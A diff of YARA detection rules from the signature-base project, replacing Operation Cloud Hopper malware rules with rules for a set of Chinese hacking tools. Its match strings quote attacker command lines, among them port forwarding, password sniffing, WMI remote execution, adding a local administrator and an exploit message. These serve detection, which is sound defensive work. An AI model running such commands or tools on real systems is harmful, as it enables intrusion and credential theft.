+		$s1 = "fpipe -l 53 -s 53 -r 80 192.168.1.101" fullword ascii
+		$s2 = "FPipe.exe" fullword wide
+		$s3 = "http://www.foundstone.com" fullword ascii
+		$s4 = "%s %s port %d. Address is already in use" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 65KB and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_6 : FILE
+rule SIGNATURE_BASE_Dos_Netstat : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file netstat.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b7578cbd-0f41-5dec-86f6-5792c305a182"
-		date = "2017-04-03"
+		id = "bc3141bf-4e82-5aa4-a8a6-a0a4586ee9a1"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L136-L152"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1069-L1085"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f165912001c5e2eb48cef46df12220f7f7a53e908a6af571bb4932c50e355388"
+		hash = "d0444b7bd936b5fc490b865a604e97c22d97e598"
+		logic_hash = "e2b908308616c3f2c94849b4f22f0e9bb130b5759d89161604505ff25681be55"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6"
 
 	strings:
-		$s1 = "YDNCCOVZKXGRVQPOBRNXXQVNQYXBBCONCOQEGYELIRBEYOVODGXCOXTHXPCXNGUCHRVWKKZSYQMAOWWGHRSPRGSEUWYMEFZHRTHO" fullword ascii
-		$s2 = "psychiatry.dat" fullword ascii
-		$s3 = "meekness.lnk" fullword ascii
-		$s4 = "SOFTWARE\\EGGORG" fullword ascii
+		$s0 = "w03a2409.dll" fullword ascii
+		$s1 = "Retransmission Timeout Algorithm    = unknown (%1!u!)" fullword wide
+		$s2 = "Administrative Status  = %1!u!" fullword wide
+		$s3 = "Packet Too Big            %1!-10u!  %2!-10u!" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_7 : FILE
+rule SIGNATURE_BASE_CN_Tools_Xsniff : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file xsniff.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d32e379-c902-5330-84f5-693a7649a2e4"
-		date = "2017-04-03"
+		id = "a0fdac88-a7b8-5d24-9012-2bfe7b07e675"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L154-L168"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1087-L1104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "01993e785fb7d5de9ea629d31725e86fa169b70dcde9716a5da0b646ac88864a"
+		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
+		logic_hash = "a32d07ecd635ad71edaa37d9b1e5f66d8ce5a7f84f1bba6eb06deb1f49a879c8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "44a7bea8a08f4c2feb74c6a00ff1114ba251f3dc6922ea5ffab9e749c98cbdce"
 
 	strings:
-		$x1 = "jepsjepsjepsjepsjepsjepsjepsjepsjepsjeps" fullword ascii
-		$x2 = "extOextOextOextO" fullword ascii
+		$s0 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
+		$s1 = "HOST: %s USER: %s, PASS: %s" fullword ascii
+		$s2 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
+		$s10 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+		$s11 = "%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_8 : FILE
+rule SIGNATURE_BASE_Mssqlpass : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file MSSqlPass.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5e0a09e3-732a-5a90-9d4a-11eae2aa4cc4"
-		date = "2017-04-03"
+		id = "d45b417f-3649-5603-bd19-8b8bcc19dabc"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L170-L189"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1106-L1121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a27b041a1ff0fae3d06d8050fe3207435cb84f421099dc1cad8f8a503e976860"
+		hash = "172b4e31ed15d1275ac07f3acbf499daf9a055d7"
+		logic_hash = "8037316eb157f8693bd342911af5fe5292f3ef8a3c169c80bc70edbabd7a92e6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "19aa5019f3c00211182b2a80dd9675721dac7cfb31d174436d3b8ec9f97d898b"
-		hash2 = "5cebc133ae3b6afee27beb7d3cdb5f3d675c3f12b7204531f453e99acdaa87b1"
 
 	strings:
-		$s1 = "WSHELL32.dll" fullword wide
-		$s2 = "operator \"\" " fullword ascii
-		$s3 = "\" /t REG_SZ /d \"" fullword wide
-		$s4 = " /f /v \"" fullword wide
-		$s5 = "zok]\\\\\\ZZYYY666564444" fullword ascii
-		$s6 = "AFX_DIALOG_LAYOUT" fullword wide
+		$s0 = "Reveals the passwords stored in the Registry by Enterprise Manager of SQL Server" wide
+		$s1 = "empv.exe" fullword wide
+		$s2 = "Enterprise Manager PassView" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 120KB and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_9 : FILE
+rule SIGNATURE_BASE_Wsockexpert : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file WSockExpert.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5a02f2ac-905d-550a-bde0-cfde6ed1a4ab"
-		date = "2017-04-03"
+		id = "0ae115be-c516-5f4a-97ce-555d84f42947"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L191-L205"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1123-L1141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f45159a508ce8ccb5ab57c7347916642f58ab1b6e0a8886ba53e4810ed65c5c1"
+		hash = "2962bf7b0883ceda5e14b8dad86742f95b50f7bf"
+		logic_hash = "34ac3c5f0651ccab851d67da8863e0e305f981cf53a06d46c23f19736cc1c400"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f0002b912135bcee83f901715002514fdc89b5b8ed7585e07e482331e4a56c06"
 
 	strings:
-		$s1 = "MsMpEng.exe" fullword ascii
-		$op0 = { 2b c7 50 e8 22 83 ff ff ff b6 c0 }
+		$s1 = "OpenProcessCmdExecute!" fullword ascii
+		$s2 = "http://www.hackp.com" fullword ascii
+		$s3 = "'%s' is not a valid time!'%s' is not a valid date and time" fullword wide
+		$s4 = "SaveSelectedFilterCmdExecute" fullword ascii
+		$s5 = "PasswordChar@" fullword ascii
+		$s6 = "WSockHook.DLL" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 4 of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_10 : FILE
+rule SIGNATURE_BASE_Ms_Viru_Racle : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file racle.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a5d3237e-d6db-54ba-bfa6-f642f8096819"
-		date = "2017-04-03"
+		id = "bdc78dcc-79e6-5516-bba2-54bf537eae38"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L207-L222"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1143-L1159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "538754e6daadd3efa3e77723dce7143fecad28cf94caa1b29a2d45df44b14ee4"
+		hash = "13116078fff5c87b56179c5438f008caf6c98ecb"
+		logic_hash = "d36db04c6a62a72e9f3079d09aedc9056c0a5032b4594af4d02ba55373f8b6a4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5b4028728d8011a2003b7ce6b9ec663dd6a60b7adcc20e2125da318e2d9e13f4"
 
 	strings:
-		$x1 = "bakshell.EXE" fullword wide
-		$s19 = "bakshell Applicazione MFC" fullword wide
-		$op0 = { 83 c4 34 c3 57 8b ce e8 92 18 00 00 68 20 70 40 }
+		$s0 = "PsInitialSystemProcess @%p" fullword ascii
+		$s1 = "PsLookupProcessByProcessId(%u) Failed" fullword ascii
+		$s2 = "PsLookupProcessByProcessId(%u) => %p" fullword ascii
+		$s3 = "FirstStage() Loaded, CurrentThread @%p Stack %p - %p" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 210KB and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_11 : FILE
+rule SIGNATURE_BASE_Lamescan3 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file lamescan3.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "18bd2fa9-7eca-5dbc-8e79-953800d5bb0a"
-		date = "2017-04-03"
+		id = "8ff1a0e6-d054-589d-a038-f889951ba250"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L224-L240"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1161-L1177"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7935d3aeef0d4c94a00dd44942a1ba97d0c9fce848914ebc9c59d9f8e9f51599"
+		hash = "3130eefb79650dab2e323328b905e4d5d3a1d2f0"
+		logic_hash = "8246128fa4378b0479a0c051965188c7c3fa0f52c8acc8934ef8af3155a85590"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a80f6c57f772f20d63021c8971a280c19e8eafe7cc7088344c598d84026dda15"
 
 	strings:
-		$x1 = "IOGVWDWCXZVRHTE" fullword ascii
-		$op1 = { c9 c3 56 6a 00 8b f1 6a 64 e8 dd 34 00 00 c7 06 }
-		$op2 = { 68 38 00 41 00 68 34 00 41 00 e8 d3 }
+		$s1 = "dic\\loginlist.txt" fullword ascii
+		$s2 = "Radmin.exe" fullword ascii
+		$s3 = "lamescan3.pdf!" fullword ascii
+		$s4 = "dic\\passlist.txt" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3740KB and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Lockdown : FILE
+rule SIGNATURE_BASE_CN_Tools_Pc : FILE
 {
 	meta:
-		description = "Tools related to Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file pc.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0500f19c-597b-5904-8401-35236215ff29"
-		date = "2017-04-07"
+		id = "11cc6c46-33c0-5c53-88f8-700be9ca8add"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L251-L265"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1179-L1195"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3f24c08817bc94bb4b7d09d51bed62f43952f2c66338f29c4bc8e9000b3ff78a"
+		hash = "5cf8caba170ec461c44394f4058669d225a94285"
+		logic_hash = "1da263362e4c2ec8194bb80bfc3f25ff8c4b708919ba02ea02687d5404b99720"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ca61cef74573d9c1d19b8191c23cbd2b7a1195a74eaba037377e5ee232b1dc5"
 
 	strings:
-		$s1 = "lockdown.dll" fullword ascii
-		$s3 = "mfeann.exe" fullword ascii
+		$s0 = "\\svchost.exe" ascii
+		$s2 = "%s%08x.001" fullword ascii
+		$s3 = "Qy001Service" fullword ascii
+		$s4 = "/.MIKY" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Windowxarbot : FILE
+rule SIGNATURE_BASE_Dos_Down64 : FILE
 {
 	meta:
-		description = "Malware related to Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file Down64.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4434632a-1886-5e8b-a205-12220263980a"
-		date = "2017-04-07"
+		id = "b4907ede-dc6a-5b8c-bf1c-557df54191a4"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L267-L279"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1197-L1215"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5d8a9c25032c5371e843f8e80884e43a64c73b1644605b39b2dff11104c3bbcd"
+		hash = "43e455e43b49b953e17a5b885ffdcdf8b6b23226"
+		logic_hash = "d181c2075762fc3bb5b61bcdef57eb6533cb59dde03c4b901b6ce5b8323f3c8a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\Release\\WindowXarbot.pdb" ascii
+		$s1 = "C:\\Windows\\Temp\\Down.txt" fullword wide
+		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
+		$s3 = "C:\\Windows\\Temp\\" wide
+		$s4 = "ProcessXElement" fullword ascii
+		$s8 = "down.exe" fullword wide
+		$s20 = "set_Timer1" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Wmidll_Inmemory
+rule SIGNATURE_BASE_Epathobj_Exp32 : FILE
 {
 	meta:
-		description = "Malware related to Operation Cloud Hopper - Page 25"
+		description = "Chinese Hacktool Set - file epathobj_exp32.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0afb6e52-bc9a-5a68-890b-79a017e5d554"
-		date = "2017-04-07"
-		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L281-L293"
+		id = "ca4639af-ee4f-5220-9595-e7a06b9a8534"
+		date = "2015-06-13"
+		modified = "2022-12-21"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1217-L1235"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6dddda4e519eeaa67eb4c21151cab10553420a23a077751e0fc45fcae0bf6e69"
+		hash = "ed86ff44bddcfdd630ade8ced39b4559316195ba"
+		logic_hash = "8959837257848a08240d0423971b9d3a850a7e9cc796de2c9b2d34814923f8ec"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "wmi.dll 2>&1" ascii
+		$s0 = "Watchdog thread %d waiting on Mutex" fullword ascii
+		$s1 = "Exploit ok run command" fullword ascii
+		$s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" ascii
+		$s3 = "Alllocated userspace PATHRECORD () %p" fullword ascii
+		$s4 = "Mutex object did not timeout, list not patched" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 270KB and all of them
 }
-rule SIGNATURE_BASE_VBS_Wmiexec_Tool_Apr17_1 : FILE
+rule SIGNATURE_BASE_Tools_Unknown : FILE
 {
 	meta:
-		description = "Tools related to Operation Cloud Hopper"
+		description = "Chinese Hacktool Set - file unknown.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8175eb74-38f1-5d8f-a668-aa8e215b032e"
-		date = "2017-04-07"
+		id = "2cb75a84-506d-5b67-8b1f-b91beb5a99a3"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L295-L318"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1237-L1254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b0aad1c8dfc07ae3df835ae113bd02abfd706a0646ffcac5dd5691822016d31a"
+		hash = "4be8270c4faa1827177e2310a00af2d5bcd2a59f"
+		logic_hash = "493bb63d4dd519efbf53a29fa44ef74f0a85943b2d9f49f11e3daa57c6b03d8e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "21bc328ed8ae81151e7537c27c0d6df6d47ba8909aebd61333e32155d01f3b11"
 
 	strings:
-		$x1 = "strNetUse = \"cmd.exe /c net use \\\\\" & host" fullword ascii
-		$x2 = "localcmd = \"cmd.exe /c \" & command " ascii
-		$x3 = "& \" > \" & TempFile & \" 2>&1\"  '2>&1 err" fullword ascii
-		$x4 = "strExec = \"cmd.exe /c \" & cmd & \" >> \" & resultfile & \" 2>&1\"  '2>&1 err" fullword ascii
-		$x5 = "TempFile = objShell.ExpandEnvironmentStrings(\"%TEMP%\") & \"\\wmi.dll\"" fullword ascii
-		$a1 = "WMIEXEC ERROR: Command -> " ascii
-		$a2 = "WMIEXEC : Command result will output to" fullword ascii
-		$a3 = "WMIEXEC : Target ->" fullword ascii
-		$a4 = "WMIEXEC : Login -> OK" fullword ascii
-		$a5 = "WMIEXEC : Process created. PID:" fullword ascii
+		$s1 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
+		$s2 = "GET /ok.asp?id=1__sql__ HTTP/1.1" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s4 = "Failed to clear tab control Failed to delete tab at index %d\"Failed to retrieve" wide
+		$s5 = "Host: 127.0.0.1" fullword ascii
 
 	condition:
-		( filesize < 40KB and 1 of them ) or 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 4 of them
 }
-rule SIGNATURE_BASE_Ping_Command_In_EXE : FILE
+rule SIGNATURE_BASE_PLUGIN_Ajunk : FILE
 {
 	meta:
-		description = "Detects an suspicious ping command execution in an executable"
+		description = "Chinese Hacktool Set - file AJunk.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "937ab622-fbcf-5a31-a3ff-af2584484140"
-		date = "2016-11-03"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L2-L15"
+		id = "af92d01d-5e24-52f7-934a-0ad102fc7a93"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1256-L1271"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1ea24774471eade7b7c50f0eae520e2b30dbec693e162b83ab0074465f179372"
-		score = 60
+		hash = "eb430fcfe6d13b14ff6baa4b3f59817c0facec00"
+		logic_hash = "e37504aab506138493ddc0979697502819824ef00c7931599130fafb5d84a7a9"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "cmd /c ping 127.0.0.1 -n " ascii
+		$s1 = "AJunk.dll" fullword ascii
+		$s2 = "AJunk.DLL" fullword wide
+		$s3 = "AJunk Dynamic Link Library" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 560KB and all of them
 }
-rule SIGNATURE_BASE_Googlebot_Useragent : FILE
+rule SIGNATURE_BASE_Iisputscanner : FILE
 {
 	meta:
-		description = "Detects the GoogleBot UserAgent String in an Executable"
+		description = "Chinese Hacktool Set - file IISPutScanner.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "621532ac-fc0b-5118-84b0-eac110693320"
-		date = "2017-01-27"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L17-L32"
+		id = "699ee45d-c842-56eb-b55b-12a91e815a7b"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1273-L1316"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa6cc3625d3740b91d7f1193cea0bdb621ae9445e42300123b01e322f715b976"
-		score = 65
-		quality = 85
+		hash = "9869c70d6a9ec2312c749aa17d4da362fa6e2592"
+		logic_hash = "b2af9003cef528610280866bf00a9716b4421a5f7c65e7c8ec3202af9a592de1"
+		score = 75
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" fullword ascii
-		$fp1 = "McAfee, Inc." wide
+		$s2 = "KERNEL32.DLL" fullword ascii
+		$s3 = "ADVAPI32.DLL" fullword ascii
+		$s4 = "VERSION.DLL" fullword ascii
+		$s5 = "WSOCK32.DLL" fullword ascii
+		$s6 = "COMCTL32.DLL" fullword ascii
+		$s7 = "GDI32.DLL" fullword ascii
+		$s8 = "SHELL32.DLL" fullword ascii
+		$s9 = "USER32.DLL" fullword ascii
+		$s10 = "OLEAUT32.DLL" fullword ascii
+		$s11 = "LoadLibraryA" fullword ascii
+		$s12 = "GetProcAddress" fullword ascii
+		$s13 = "VirtualProtect" fullword ascii
+		$s14 = "VirtualAlloc" fullword ascii
+		$s15 = "VirtualFree" fullword ascii
+		$s16 = "ExitProcess" fullword ascii
+		$s17 = "RegCloseKey" fullword ascii
+		$s18 = "GetFileVersionInfoA" fullword ascii
+		$s19 = "ImageList_Add" fullword ascii
+		$s20 = "BitBlt" fullword ascii
+		$s21 = "ShellExecuteA" fullword ascii
+		$s22 = "ActivateKeyboardLayout" fullword ascii
+		$s23 = "BBABORT" fullword wide
+		$s25 = "BBCANCEL" fullword wide
+		$s26 = "BBCLOSE" fullword wide
+		$s27 = "BBHELP" fullword wide
+		$s28 = "BBIGNORE" fullword wide
+		$s29 = "PREVIEWGLYPH" fullword wide
+		$s30 = "DLGTEMPLATE" fullword wide
+		$s31 = "TABOUTBOX" fullword wide
+		$s32 = "TFORM1" fullword wide
+		$s33 = "MAINICON" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and $x1 and not 1 of ( $fp* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and filesize > 350KB and all of them
 }
-rule SIGNATURE_BASE_Gen_Net_Localgroup_Administrators_Add_Command : FILE
+rule SIGNATURE_BASE_Idtools_For_Winxp_Idttool_2 : FILE
 {
 	meta:
-		description = "Detects an executable that contains a command to add a user account to the local administrators group"
+		description = "Chinese Hacktool Set - file IdtTool.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f6095fc-6d9f-5814-b407-f320191fd912"
-		date = "2017-07-08"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L34-L46"
+		id = "0312be49-c262-5143-abfc-02d428552b86"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1318-L1335"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "af4d7c8586022583e2019bbdc3638704e1d237b25e3c214f3bc2db64c58c8bd3"
+		hash = "07feb31dd21d6f97614118b8a0adf231f8541a67"
+		logic_hash = "831f42abd7374b2ca2b4115a73aae2123e2212b0854d4cc0950b8e66a28e38a3"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = /net localgroup administrators [a-zA-Z0-9]{1,16} \/add/ nocase ascii
